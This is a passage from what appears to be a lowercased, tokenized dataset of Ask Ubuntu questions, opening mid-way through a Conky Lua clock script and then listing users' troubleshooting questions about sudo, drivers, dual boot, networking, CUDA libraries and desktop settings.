start_angle=319 , end_angle=401 } , { name='memperc ' , arg= '' , max=100 , bg_colour=0xffffff , bg_alpha=0.2 , fg_colour=0xff6600 , fg_alpha=0.8 , x=100 , y=600 , radius=25 , thickness=5 , start_angle=-90 , end_angle=180 } , { name='swapperc ' , arg= '' , max=100 , bg_colour=0xffffff , bg_alpha=0.2 , fg_colour=0xff6600 , fg_alpha=0.8 , x=100 , y=400 , radius=25 , thickness=5 , start_angle=-90 , end_angle=180 } , { name='fs_used_perc ' , arg='/ ' , max=100 , bg_colour=0xffffff , bg_alpha=0.2 , fg_colour=0xee2266 , fg_alpha=0.8 , x=120 , y=600 , radius=85 , thickness=5 , start_angle=0 , end_angle=360 } , { name='downspeedf ' , arg='wlan0 ' , max=75 , bg_colour=0xffffff , bg_alpha=0.2 , fg_colour=0x339900 , fg_alpha=10 , x=120 , y=600 , radius=100 , thickness=6 , start_angle=-77 , end_angle=75 } , { name='upspeedf ' , arg='wlan0 ' , max=262 , bg_colour=0xffffff , bg_alpha=0.2 , fg_colour=0x339900 , fg_alpha=10 , x=120 , y=600 , radius=100 , thickness=6 , start_angle=103 , end_angle=262 } , } -- use these settings to define the origin and extent of your clock . clock_r=65 -- `` clock_x '' and `` clock_y '' are the coordinates of the centre of the clock , in pixels , from the top left of the conky window . clock_x=120 clock_y=600 show_seconds=true require 'cairo' function rgb_to_r_g_b ( colour , alpha ) return ( ( colour / 0x10000 ) % 0x100 ) / 255. , ( ( colour / 0x100 ) % 0x100 ) / 255. , ( colour % 0x100 ) / 255. , alpha end function draw_ring ( cr , t , pt ) local w , h=conky_window.width , conky_window.height local xc , yc , ring_r , ring_w , sa , ea=pt [ 'x ' ] , pt [ 'y ' ] , pt [ 'radius ' ] , pt [ 'thickness ' ] , pt [ 'start_angle ' ] , pt [ 'end_angle ' ] local bgc , bga , fgc , fga=pt [ 'bg_colour ' ] , pt [ 'bg_alpha ' ] , pt [ 'fg_colour ' ] , pt [ 'fg_alpha ' ] local angle_0=sa* ( 2*math.pi/360 ) -math.pi/2 local angle_f=ea* ( 2*math.pi/360 ) -math.pi/2 local t_arc=t* ( angle_f-angle_0 ) -- draw background ring cairo_arc ( cr , xc , yc , ring_r , angle_0 , angle_f ) cairo_set_source_rgba ( cr , rgb_to_r_g_b ( bgc , bga ) ) cairo_set_line_width ( cr , ring_w ) cairo_stroke ( cr ) -- draw indicator ring cairo_arc ( cr , xc , yc , ring_r , angle_0 , angle_0+t_arc ) cairo_set_source_rgba ( cr , rgb_to_r_g_b ( fgc , fga ) ) cairo_stroke ( cr ) end function draw_clock_hands ( cr , xc , yc ) local secs , mins , hours , secs_arc , mins_arc , hours_arc local xh , yh , xm , ym , xs , ys secs=os.date ( `` % s '' ) mins=os.date ( `` % m '' ) hours=os.date ( `` % i '' ) secs_arc= ( 2*math.pi/60 ) *secs mins_arc= ( 2*math.pi/60 ) *mins+secs_arc/60 hours_arc= ( 2*math.pi/12 ) *hours+mins_arc/12 -- draw hour hand xh=xc+0.7*clock_r*math.sin ( hours_arc ) yh=yc-0.7*clock_r*math.cos ( hours_arc ) cairo_move_to ( cr , xc , yc ) cairo_line_to ( cr , xh , yh ) cairo_set_line_cap ( cr , cairo_line_cap_round ) cairo_set_line_width ( cr,5 ) cairo_set_source_rgba ( cr,1.0,1.0,1.0,1.0 ) cairo_stroke ( cr ) -- draw minute hand xm=xc+clock_r*math.sin ( mins_arc ) ym=yc-clock_r*math.cos ( mins_arc ) cairo_move_to ( cr , xc , yc ) cairo_line_to ( cr , xm , ym ) cairo_set_line_width ( cr,3 ) cairo_stroke ( cr ) -- draw seconds hand if show_seconds then xs=xc+clock_r*math.sin ( secs_arc ) ys=yc-clock_r*math.cos ( secs_arc ) cairo_move_to ( cr , xc , yc ) cairo_line_to ( cr , xs , ys ) cairo_set_line_width ( cr,1 ) cairo_stroke ( cr ) end end function conky_clock_rings ( ) local function setup_rings ( cr , pt ) local str= '' local value=0 str=string.format ( ' $ { % s % s } ' , pt [ 'name ' ] , pt [ 'arg ' ] ) str=conky_parse ( str ) value=tonumber ( str ) pct=value/pt [ 'max ' ] draw_ring ( cr , pct , pt ) end -- check that conky has been running for at least 5s if conky_window==nil then return end local cs=cairo_xlib_surface_create ( conky_window.display , conky_window.drawable , conky_window.visual , conky_window.width , conky_window.height ) local cr=cairo_create ( cs ) local updates=conky_parse ( ' $ { updates } ' ) update_num=tonumber ( updates ) if update_num > 5 then for i in pairs ( settings_table ) do setup_rings ( cr , settings_table [ i ] ) end end draw_clock_hands ( cr , clock_x , clock_y ) end please help , what is wrong with it ?
266982	how to save sudo vim /sbin/chkconfig	i am following the steps of oracle installation in this site http : //meandmyubuntulinux.blogspot.ca/2012/05/installing-oracle-11g-r2-express.html . i do n't know how to save the file . typing a command like command sudo vim /sbin/chkconfig is opening a nano text editor . so how to save that file ?
266986	authentication failed with the correct password and now i can not use sudo anymore	recently i installed ubuntu 12.04 ( first time on ubuntu ) . i have my normal `` administrator '' , and another guest account . i was experimenting today with the user accounts , and set my `` administrator '' account to `` standard '' in user account settings . now whenever something asks me for authentication , it gives me failed message . i am using the same old password , did n't create new accounts , just changed privileges . i 'm sure that the password is correct , because i can still log in . i tried logging in to root from terminal , but it gave me that i 'm not one of the sudoers .
266987	why does nmap show tor on ubuntu	when i run nmap from my ubuntu workstation tor ports are shown ( as closed ) on our server . starting nmap 5.21 ( http : //nmap.org ) at 2013-03-12 10:22 cdt nmap scan report for xx.xx.xx.xx host is up ( 0.062s latency ) . not shown : 985 filtered ports port state service 20/tcp closed ftp-data 21/tcp open ftp 80/tcp open http 443/tcp open https 2020/tcp open xinupageserver 3306/tcp open mysql 9000/tcp closed cslistener 9001/tcp closed tor-orport 9002/tcp closed unknown 9003/tcp closed unknown 9009/tcp closed unknown 9010/tcp closed unknown 9011/tcp closed unknown 9040/tcp closed tor-trans 9050/tcp closed tor-socks these ports are not displayed in an nmap originating from redhat : starting nmap 4.11 ( http : //www.insecure.org/nmap/ ) at 2013-03-12 09:42 cdt interesting ports on mugglenet.com ( xx.xx.xx.xx ) : not shown : 1674 filtered ports port state service 20/tcp closed ftp-data 21/tcp open ftp 80/tcp open http 443/tcp open https 2020/tcp open xinupageserver 3306/tcp open mysql i know that the systems are running different versions of nmap , do newer versions of nmap scan common tor ports by default ?
266991	in ubuntu 12.10 how to enable /proc/net/ip_conntrack ?	i 've tried sudo modprobe ip_conntrack to no avail . i ca n't find anything about enabling this . does anyone know how ?
266996	ubuntu woes on permissions	i ran sudo chmod -r myusername : myusername on i thought my /workspaces directory but it appears it did the command ran on the root directory , resulting in errors such as : could not update iceauthority file /home/myusername/.iceauthority and then i click on close , and a second message appears as : there is a problem with the configuration server . ( /usr/bin/libgconf2-4g/conf-sanity-check-2 exited with status 256 also it seems when the screen saver comes on and i need to unlock the screen , it keeps on saying incorrect password , even though i am typing the same correct password . i will need to restart the computer and then be able to successfully login . i turned the screen saver/screen lock option off so i will not need to unlock the computer again . i read over posts , and some suggested the easiest way to reset permissions is to re-install your ubuntu.but hhow do i find what version of ubuntu i am using to get the right version to re-install it over the existing installation ? will this keep my programs/workspaces intact or should i back these up and copy them back over when i finish re-installing ubuntu . is there something i am missing to simply revert the permissions of this ubuntu installation ? this is a station at my new job so i do n't really want to change what i have not unless i have too . any and all information appreciated .
266998	why does n't ctrl-pgup and ctrl-pgdn change tabs in vim when started in byobu ?	from what i have read of the documentation , byobu does not use ctrl-pgup or ctrl-pgdn for anything , so why is it that when i start `` vim -p file1 file2 '' , and try to move among the different tabs with ctrl-pgup or ctrl-pgdn , nothing happens ?
266999	ca n't store file to ubuntu one ios client	i try to store files in ubuntu one with help of standard tool in ios 6.1 but when i tap on arrow menu shows only google drive and does n't show ubuntu one client for storing data
267000	can not compile java code [ unicode byte order mark 65279 ]	i wrote a simple java program with the gedit text editor . public class example { public static void main ( string args [ ] ) { system.out.println ( `` hi yaar '' ) ; } } when i tried to compile it on the terminal , it threw out a lot of errors , and i do n't know why . it 's supposed to work . here are the errors : arvind @ arvind-hp-pavilion-g6-notebook-pc : ~/documents $ javac example.java example.java:1 : error : illegal character : \65279 public class example { ^ example.java:1 : error : class , interface , or enum expected public class example { ^ example.java:2 : error : class , interface , or enum expected public static void main ( string args [ ] ) ^ example.java:5 : error : class , interface , or enum expected } ^ 4 errors i have tried to search on a lot of forums , but did not find an answer . how can i solve this ? any help appreciated . thanks .
267010	how to configure teamviewer so it does not load unless needed	i installed teamviewer to help a friend ( afterwards i forcibly moved him to using google hangout ) and noticed that it loads automatically a process even if i am not running teamviewer : it does not show in the startup applications so i am guessing it is either hidden in the startup applications or it is loaded by an option in a configuration file . i want to remove this automatic way of loading into memory so that it only works when i actually use teamviewer and not every time i boot the computer .
267016	the package sudo needs to be reinstalled , but i ca n't find an archive for it	it seems i have landed in trouble ... . on running update-manager or synaptic i get this message '' e : the package sudo needs to be reinstalled , but i ca n't find an archive for it . '' i searched for solutions and found couple of them . first was to use command sudo dpkg -- remove -- force-remove-reinstreq sudo it failed with an error message dpkg : error : -- remove needs at least one package name argument type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! i tried adding dependecies but again something else was dependent on them . i quit this approach after few tries . the other approach was to use # become root sudo -i cd /var/lib/dpkg/info rm -rf sudo* dpkg -- remove -- force-remove-reinstreq sudo exit this also failed . both these approaches are given in apt/synaptic needs to reinstall package . do i have any other way to recover from this error ? thanks
267019	how can i prevent users accessing anything but their own home directory ?	how can i prevent users accessing anything but their own home directory ? for example , i have a ntfs partition mounted under /media/ntfs , so if the user logs in through ssh he can reach this partition . how can i disable the users to cd out from their home directory ?
267022	how to make a device ( with a windows application on it ) ask to install a program on wine ?	ok , lets say i insert a htc phone into my laptop . on windows , it says : would you like to install htc sync manager ? yes or no . and i would click 'yes ' . but on ubuntu it does nothing like that . it just lets me use 3g and/or view it 's files . i have wine installed . so , can i get it to install a windows application on wine ?
267028	curl/types.h file or directory not found	i have a cpp code to compile but while compiling it is showing the error of curl/types.h file or directory not found , compilation error , fatal error . i am using ubuntu 12.10. please help me to fix this . thank you .
267030	why videos play in ubuntu-provided libreoffice , but not in libreoffice from community-supplied installers ?	when i install libreoffice from ubuntu repository , import and playing of videos ( flv , mp4 ... ) works just fine . if i uninstall that version and install libreoffice from the lo download page , the same videos neither insert correctly or play . most recently this happened when i moved to lo4 on my 12.10 laptop . can anyone tell me why this is happening ?
267032	how to install fwbuilder on ubuntu 12.04 ?	i 'm trying install fwbuilder , but i get error that told me : summary : running as user : root firewall name : mti installer uses user name : fwadmin management address : 192.168.1.6 platform : iptables host os : linux24 loading configuration from file /home/amr/fwbuilder/repo/mti.fwb installation plan : copy file : /home/amr/fwbuilder/repo/mti.fw -- > /etc/fw/mti.fw run script : echo ' -- ** -- ** -- ' ; chmod +x /etc/fw/mti.fw ; sudo -s /etc/fw/mti.fw & & echo 'policy activated' copying /home/amr/fwbuilder/repo/mti.fw - > 192.168.1.6 : /etc/fw/mti.fw running command '/usr/bin/fwbuilder -y scp -o connecttimeout=30 -p 2222 ~/.ssh/identity -q /home/amr/fwbuilder/repo/mti.fw fwadmin @ 192.168.1.6 : /etc/fw/mti.fw' firewall builder gui 5.1.0.3599 ssh : connect to host 192.168.1.6 port 2222 : connection refused lost connection ssh session terminated , exit status : 1 firewall policy installation failed how do i stop this error ? any help appreciated . thanks .
267038	why ca n't change my desktop background ?	when i right click > change desktop backgroud , and it takes me to the system settings screen . there 's no `` appearance '' .
267039	where does gnome-do store its information	i want to know where does gnome-do store its information . ( configuration and history info ) . http : //do.cooperteam.net/release.shtml thanks .
267042	use iphone as a wireless track pad for ubuntu 12.10 64	anyone know a good app that can use my iphone 3gs as a track pad ?
267046	how to make pen drive bootable and from where i get .iso file ?	i have lenovo g580 ( i5 3rd gen ) laptop with win7 ( 64bit ) ultimate . i want to install ubuntu 12.04.2 ( 64bit ) with usb for dual boot . i download it from ubuntu.com with named `` ubuntu-12.04.2-desktop-amd64 '' . now where can can i get its .iso file or else i directly start process by clicking on '' wubi '' ? i tried to make my pen drive bootable with `` universal usb installer '' but it hangs . thanks in advance
267047	ca n't resume after suspend	cant log in after suspend after i click suspend my pc goes to sleep mode and everything is fine . but when i click the power button i get a black screen with all kinds of awful colored lines all over it . it must be the log in screen but i ca n't type my password the keyboard does not work . after a few seconds the monitor shuts down and the only way to fix this is a hard reset . does anyone have a similar problem ? i have installed the nvidia drivers by opening a program called additional drivers and it is activated cause i see a green light at the bottom . i have ubuntu 12.4 lts 64 bit . my cpu type is quadcore intel core i7-2600 , 3400 mhz . my main memory is 12268 mb . and my graphic card is nvidia geforce gt 545 . here is the screen i get when i try to wake up pc from suspend : ubuntu logo missing on start up also when i start my pc and choose ubuntu from the grub menu i do n't see the ubuntu logo loading , just a purple screen and after a few seconds i get into ubuntu . on my other pc i see ubuntu logo which is loading . why is that ? hear are my partitions
267048	dual booting issues , windows 8 , 12.10 , eufi	i just purchased a windows 8 desktop and set about installing ubuntu . the installer could n't read the hdd , so i installed ubuntu to a separate drive . now i ca n't boot into windows , says grub ca n't find the path , and the only way to boot into ubuntu is to keep the usb stick in , i assume the efi partition is on the stick , but i 've tried installing it to the drive and have n't found any success . i ran boot repair , says all is good , but the problem persists . i 've tried googling for a similar problem and have come up empty handed . any suggestions ? edit : boot repair got ubuntu to boot with the usb stick , however windows 8 still wo n't load . says it ca n't find the drive or the efi file . is grub not mounting the disk windows is installed on ?
267049	how to display trash and home folder icons ?	i 've googled quite a bit but nothing i 've found works . i just want to display the trash , home folder , computer etc icons on my desktop in ubuntu . the closest i 've come is installing dconf-tools , running it , going to org - > gnome - > desktop - > background and checking show-desktop-icons then org - > gnome - > nautilus - > desktop and checking the icons i want to show . nothing happens . i 've also tried looking in compizconfig-settings-manager and gconf-editor but ca n't find anything there . ideas ?
267058	xorg and compiz using 20 % of cpu	i 'm not doing anything in particular but xorg is currently using 8-15 % of my cpu and compiz is using 5-15 % as well . i have 4 virtual desktops ( aka workspaces ) and like 10 windows open but i see no reason why it should be using this much cpu . i 'm using 12.10 on a asus ux31a , does anybody have hints to lower the cpu usage ?
267062	server 12.04 - secondary ip wo n't route outside of local network	i am using ubuntu 12.04 as the platform for a virtualmin installation which will host multiple websites for the same organization . for this , i need to bind multiple ip addresses in the same subnet to the server and i am having problems doing so . i can bind the extra addresses either by using additional virtual nics ( it is a vm ) or by using virtual interfaces of one nic . in both cases the additional addresses ping just fine from any host on the local network , but only the primary nic can be pinged from any remote network . the behavior is just like what would happen if you configured a single nic with no gateway so i imagine this is an issue with the routing table , but i just ca n't produce a working config . can anyone please take a look at my config and possibly point me in the right direction ? /etc/network/interfaces # the loopback network interface auto lo eth0 eth0:0 iface lo inet loopback # the primary network interface iface eth0 inet static address 10.192.3.104 netmask 255.255.224.0 gateway 10.192.0.1 broadcast 10.192.31.255 network 10.192.0.0 dns-nameservers 10.192.0.210 10.192.0.198 127.0.0.1 iface eth0:0 inet static address 10.192.30.52 netmask 255.255.224.0 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.192.0.1 0.0.0.0 ug 100 0 0 eth0 10.192.0.0 0.0.0.0 255.255.224.0 u 0 0 0 eth0
267066	netbeans can not open shared library during run command	i have issue with netbeans : everything worked fine but i 've just tried to run my cuda programs on linux ubuntu 12.10 in netbeans and i get error : dist/debug/gnu-linux-x86/my_cuda_1 : error while loading shared libraries : libcudart.so.5.0 : can not open shared object file : no such file or directory run failed ( exit value 127 , total time : 191ms ) the projects can build : compile + link without problems , i can also run it from commandline but if i try run it from netbeans i get this error . i was able to run it few minutes ago , what might happened ? i have added file my_lib to ld.so.conf.d containing such text : /usr/local/cuda-5.0/lib64 : /lib /usr/lib /usr/lib64 can it be a link issue libcudart.so.5.0 - > licudart.so ? there are two libs in cuda/lib libcudart.so.5.0 ( link ) and libcudart.so ( link ) and libcudart.so.5.0.35 ( shared lib ) why it complains about .so.5.0 ? mayve link like : sudo ln -s /usr/lib/x86_64-linux-gnu/libglut.so.3 /usr/lib/libglut.so is necessary it is related to link to shared library i think root @ comp : # echo $ ld_library_path /usr/lib/nvidia-current : /usr/local/cuda-5.0/lib : :/usr/local/cuda-5.0/lib64 : /lib this : : is this a problem ?
267067	why are samsung-tools not working ?	i have a samsung np700z5a-s0aus laptop and i 've installed samsung-tools . but when i go to run the following command to turn on the back lit keyboard i get the following error : sudo echo 8 > /sys/class/leds/samsung\ : \ : kbd_backlight/brightness bash : /sys/class/leds/samsung : :kbd_backlight/brightness : no such file or directory and i ca n't get the backlights to turn on . i 'm using ubuntu 12.04.1 64bit 3.2.0-38-generic
267068	i have 4029 bad sectors . should i worry ?	my sata drive is from 2009 and has been under some circumstances where it 's not `` pleasant '' for the drive , such as blackouts ( lots of them ) . on ubuntu 12.04 smart reported 4029 bad sectors . i often do a zero-fill on the drive and i read that it reallocates those bad sectors . so , if it do a reallocate , why `` a failure is imminent '' ? why should i worry ? also , any tips on how to prevent this will also help !
267069	is the pm-suspend command equivalent to the gui suspend option ?	i noticed the pm-suspend command and was wondering whether this is the same as selecting the sleep option on the main menu . if not , how does it differ ?
267071	ld_library_path specification	i have problem : netbeans ca n't open libcudart.so.5.0 when i do run , though there is no problem from commandline . is this : : here root @ comp : # echo $ ld_library_path /usr/lib/nvidia-current : /usr/local/cuda-5.0/lib : :/usr/local/cuda-5.0/lib64 : /lib a problem ?
267075	how can i find out the root password ?	i installed kubuntu 12.04 on this desktop last september and am the main user of the machine . i can perform most admin tasks such as installing new software with my password , which is also accepted using sudo in a terminal . some tasks however ask for a root password - the most recent example being when i tried to re-install my hp printer . and my usual password does not work . i have looked at this answer , but it does n't seem to help as i know my own password . i need to know root 's password !
267076	low graphics mode error only during shutdown	i 'm getting the message : `` the system is running in low graphics mode . your screen , graphics card and input device settings could not be detected correctly . you will need to configure these yourself . '' ... ... but only during shutdown . it does n't impact use in any way , but it 's confusing to people who see it while the machine is shutting down . the system is not running in low graphics mode - it 's working perfectly and at the correct ( high ) resolution . how can i prevent this message from showing for 5 seconds every single time i reboot or shut down ? the message only appears during shutdown . graphics : i915 . yes , i have a ssd . i 've already put the sleep 2 in my /etc/init/lightdm.conf .
267077	html files not opening in browser	previously when i clicked on an action in a program that opens an html file it would open in the browser automatically . however , now instead of opening in the browser , it opens a nautilus window with the html file highlighted . a good example of this problem is when i try to go to the dropbox website . if you use dropbox when you click `` launch dropbox website '' it takes you to their website directly . on my computer however , it opens a nautilus window of /tmp and then i have to click on open in chrome/firefox . to get it to open up properly . thoughts ? update : updating with results of grep `` html '' /usr/share/applications/* $ grep `` html '' /usr/share/applications/* /usr/share/applications/aptanastudio3.desktop : mimetype=text/xml ; application/xhtml+xml ; application/x-javascript ; application/x-php ; application/x-java ; text/x-javascript ; text/html ; text/plain /usr/share/applications/defaults.list : application/xhtml+xml=firefox.desktop /usr/share/applications/defaults.list : text/html=firefox.desktop /usr/share/applications/firefox.desktop : mimetype=text/html ; text/xml ; application/xhtml+xml ; application/xml ; application/rss+xml ; application/rdf+xml ; image/gif ; image/jpeg ; image/png ; x-scheme-handler/http ; x-scheme-handler/https ; x-scheme-handler/ftp ; x-scheme-handler/chrome ; video/webm ; application/x-xpinstall ; /usr/share/applications/geany.desktop : mimetype=text/plain ; text/x-chdr ; text/x-csrc ; text/x-c++hdr ; text/x-c++src ; text/x-java ; text/x-dsrc ; text/x-pascal ; text/x-perl ; text/x-python ; application/x-php ; application/x-httpd-php3 ; application/x-httpd-php4 ; application/x-httpd-php5 ; application/xml ; text/html ; text/css ; text/x-sql ; text/x-diff ; /usr/share/applications/gnome-terminal.desktop : x-gnome-docpath=gnome-terminal/index.html grep : /usr/share/applications/kde4 : is a directory /usr/share/applications/kompozer.desktop : mimetype=text/html ; text/xml ; text/css ; text/x-javascript ; text/javascript ; application/xhtml+xml ; /usr/share/applications/mimeinfo.cache : application/xhtml+xml=firefox.desktop ; aptanastudio3.desktop ; kompozer.desktop ; /usr/share/applications/mimeinfo.cache : text/html=geany.desktop ; firefox.desktop ; aptanastudio3.desktop ; sublime-text-2.desktop ; kompozer.desktop ; rstudio.desktop ; /usr/share/applications/mimeinfo.cache : text/x-r-html=rstudio.desktop ; /usr/share/applications/rstudio.desktop : mimetype=text/x-r-source ; text/x-r ; text/x-r ; text/x-r-doc ; text/x-r-sweave ; text/x-r-markdown ; text/x-r-html ; application/x-r-data ; application/x-r-project ; text/x-r-history ; text/x-r-profile ; text/x-tex ; text/x-markdown ; text/html ; text/css ; text/javascript ; grep : /usr/share/applications/screensavers : is a directory /usr/share/applications/sublime-text-2.desktop : comment=sophisticated text editor for code , html and prose /usr/share/applications/sublime-text-2.desktop : mimetype=text/plain ; text/x-chdr ; text/x-csrc ; text/x-c++hdr ; text/x-c++src ; text/x-java ; text/x-dsrc ; text/x-pascal ; text/x-perl ; text/x-python ; application/x-php ; application/x-httpd-php3 ; application/x-httpd-php4 ; application/x-httpd-php5 ; application/xml ; text/html ; text/css ; text/x-sql ; text/x-diff ; x-directory/normal ; inode/directory ;
267079	permanent desktop background	is it at all possible the have the login screen desktop background remain permanent for all users and prevent them from changing to whatever they desire ? we are currently using gdm with 12.04 lts . thanks
267084	`` dependancy is not satisfiable '' in trying to install two drivers for my epson nx420 printer/scanner	i am trying to get the wireless scanner part of my epson nx420 printer working over wifi with my ubuntu 12.10 desktop computer . i went to the epson website here http : //download.ebz.epson.net/dsc/search/01/search/searchmodule to get the proper drivers . i downloaded and installed the printer drivers no problem , everything is printing great , but when i downloaded and tried to install the two scanner drivers available on the epson website in the software center i got : dependency is not satisfiable : iscan-data for iscan_2.29.1-5~usb0.1.ltdl3_amd64.deb and dependancy is not satisfiable : iscan ( > =2.21.0 ) for iscan-network-nt_1.1.0-2_amd64.deb how do i satisfy these dependancies ? also i have been trying to configure the scanner in the simple scan program to no affect , it wo n't recongnize any scanner . thats as far as i got . would love some help on this .
267087	how much mb / gb does the installation download ?	i didnt find this specific question . i am not asking how large the installer is ( 12.10 btw ) . and i am not asking if i can install ubuntu without the internet . i have read that i can just install via the boot cd or usb without an internet connection . what i would want to know is what and how much the ubuntu installation process does download if there is an internet connection . i assume it is updates ? i am in a hostel that hands out 300 - 1000 mb codes of free internet . so if i was going to let it use the internet i would be limited by that amount of megabytes . could i do those updates once i am in a new location next week ? cheers
267092	customize ubuntu login screen	i have an ubuntu 12.04 lts server on which i installed xubuntu desktop . i have some users in the server out of that i would like to set a user as a default user . how can i customize the login screen in such a manner that it just shows a 'password ' tab where we can give the password of the default user and login to the server ? the rest of the users are only allowed to ssh to the server . please help .
267093	i ca n't add or remove any programs	i got this message when i try to add or remove any program traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 285 , in _process_transaction self.fix_incomplete_install ( trans ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1021 , in fix_incomplete_install with self._frozen_status ( ) : file `` /usr/lib/python3.2/contextlib.py '' , line 48 , in __enter__ return next ( self.gen ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1160 , in _frozen_status shutil.copy ( self._status_orig , frozen_dir ) file `` /usr/lib/python3.2/shutil.py '' , line 135 , in copy copyfile ( src , dst ) file `` /usr/lib/python3.2/shutil.py '' , line 99 , in copyfile with open ( dst , 'wb ' ) as fdst : ioerror : [ errno 28 ] no space left on device : '/tmp/aptdaemon-frozen-statusrqg05n/status'
267095	ssh add bad passphrase	i have add public form another computer . on my computer i see the files in the ssh folder user @ user-170 : ~/.ssh $ ls authorized_keys config id_rsa id_rsa.pub known_hosts known_hosts.old now i see the list of keys user @ user-170 : ~/.ssh $ ssh-add -l 2048 fc : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx:13 user @ user-php ( rsa ) now i want to add authorized_keys which i have added from different computer , but it ask me to enter passphrase and what ever i enter it will just keep asking me about the pass phrase user @ user-170 : ~/.ssh $ ssh-add authorized_keys enter passphrase for authorized_keys : bad passphrase , try again for authorized_keys : bad passphrase , try again for authorized_keys : bad passphrase , try again for authorized_keys : bad passphrase , try again for authorized_keys : and it keeps on asking what passphrase should i give to take it thanks in advance
267101	why my netbeans font looks so strange ?	i 'm using ubuntu 12.10 , and i installed netbeans 7.3 php ide , but the font of netbeans looks so strange , anyone know how to fix this problem ? thanks !
267104	how do i find which proxy and port i am connected to ?	i believe that i am connected to a proxy over a vpn connection . where can i find which proxy i am connected to and ports
267109	exporting x11 over ssh	i have a server sitting in a remote lab where i have installed openstack.i want to be able to access the xwindows on that machine so as to be able to use the http interface . i am running ubuntu 11.04 on my machine.i have tried installing xterm on my machine but it does n't seem to work for some reason.it seems to be a known issue but there are n't any straight work arounds . is there some other way to export x windows to my pc ?
267112	how can i set a different .bashrc ps1 depending on the directory i 'm in ?	i have the git-prompt.sh script setup in my .bashrc file which gives me the useful git information in my prompt . this is great for small repos , but when i cd into a large repo , it can take a 30+ seconds , for the prompt to respond since it needs to review the git repo first . it is possible to set up my .bashrc so that i can either whitelist my small repos for the git prompt to display , or blacklist my large repos so it does n't load the git prompt ? alternatively , i 'd be happy with a flag/variable that i have to set to enable the git prompt . the relevant part of my .bashrc looks like this : # # # git prompt options # # source ~/.git-prompt.sh git_ps1_showdirtystate=true git_ps1_showstashstate=true git_ps1_showuntrackedfiles=true git_ps1_showupstream= '' auto '' if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] $ ( __git_ps1 `` ( \ [ \033 [ 01 ; 33m\ ] % s\ [ \033 [ 00m\ ] ) '' ) \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w $ ( __git_ps1 `` ( \ [ \033 [ 01 ; 33m\ ] % s\ [ \033 [ 00m\ ] ) '' ) \ $ ' fi unset color_prompt force_color_prompt
267115	i need to have at least opengl 3.0	i have ati mobility radeon premium graphics directx11 , hd series 5000 i searched for it and i found that it supports opengl up to version 4.1 when i updateded ubuntu 11.10 to 12.04 i got `` opengl version string : 2.1 mesa 8.0.4 '' then installed ubuntu 12.10 from scratch and still `` opengl version string : 2.1 mesa 9.0.2 '' any help , how can i update it or what should i do to get least opengl 3.0 ? thanks .
267117	flashing black and white screen when returning to gui	i have recently installed ubuntu 12.04 lts , and while experimenting with the software , i have encountered this problem : i learnt that ctrl + alt + f1~f6 can bring me to the terminal ( or was it a virtual terminal ? i am not entirely sure on that ) . either way , the terminal works , but the real problem starts when i try to exit the terminal with alt + f7 to get back to my gui . the screen starts flashing in black and white , where i could only force reboot with the power button . generally i can still access the gui by restarting , but the bug happens when i switch between the gui and the terminal . i also notice that returning from suspend also results in the same error . i am completely new to linux , especially to its command line , i would appreciate that you would keep the answers plain and easy .
267122	unable to login to steam ; steam is having trouble connecting to the servers	since steam came out on ubuntu ( official ) i 've installed it and tried to log in but it didnt work at that time . i thought the servers were offline and i would try it later again . steam is giving me the following error message : '' steam is having trouble connecting to the steam servers '' . some weeks have passed now but i 'm still not able to log in . i 've researched a lot of things and it is definitely not my router blocking steam , because i 'm running a double boot and i 'm perfectly able to run steam on my windows 8 version . as i 'm relatively new to ubuntu and the world of linux i wonder if there is any integrated firewall in ubuntu that may be blocking this , or does someone else have any suggestions or even better ; solution ( s ) , to my problem . i 'm currently running on ubuntu 12.10 and i 've installed the most recent version of steam via the ubuntu software center . i 've tried reinstalling it .
267129	line in doesnt appear on alsamixer	when i open alsamixer , i dont see line-in . just master , pcm , capture and digital . what could i do ? this is all the info i could gather about my hardware : http : //nopaste.info/03cc82b761.html
267130	new compose key list wo n't load defaults	i have created an additional list of key combinations for my compose key using the method shown at how can i add a custom compose key sequence ? . the first two lines of my file read include `` % l '' < multi_key > < underscore > < b > : `` á¸ '' u1e06 and this is saved as ~/.xcompose . i have also added export gtk_im_module= '' xim '' to my ~/.profile . the problem is that not all of my old key sequences work , including simple things like < multi_key > < e > < apostrophe > . how can i enable the old key sequences alongside my new list ? thanks , gareth .
267133	notebook freezes when running chrome : how can i limit the ram available to chrome ?	i run chrome on my laptop and it randomly freezes shortly after opening a new tab . it is a rather old notebook ( msi megabook gx600 extreme ) with a core2duo and 2gb ram . it runs ubuntu 12.10 64bit . as soon as the interface locks up , massive read / writes seem to occur as the hard drive starts to get noisy . in another thread , someone recommend running free -m , which showed memory being fully used with only 50mb ? free and swap being used 1500mb of 2000mb . how can i prevent chrome from locking up the system like that ? will limiting the memory available to it help ?
267136	importing itunes music library in rhythmbox	i have a extensive music library in itunes on my mac . i have found a dozen import scripts to import the metadata ( ratings , play count ) to rhythmbox . but the comments i have found all indicate that they do not work very well , and none of them are in active development/have had any fixes to them after being initially dumped on the web . considering that this is something a user/developer only has to do once does anyone have experience with importing an itunes library in rhythmbox ? any importer scripts that can be recommended ? also , i do not understand how these scripts are supposed to import the music itself . the directory structures and paths will be different , for example , and they do not seem to address that . the scripts iâve seen are itunes2rhythm and itunes-to-rhythmbox-ratings .
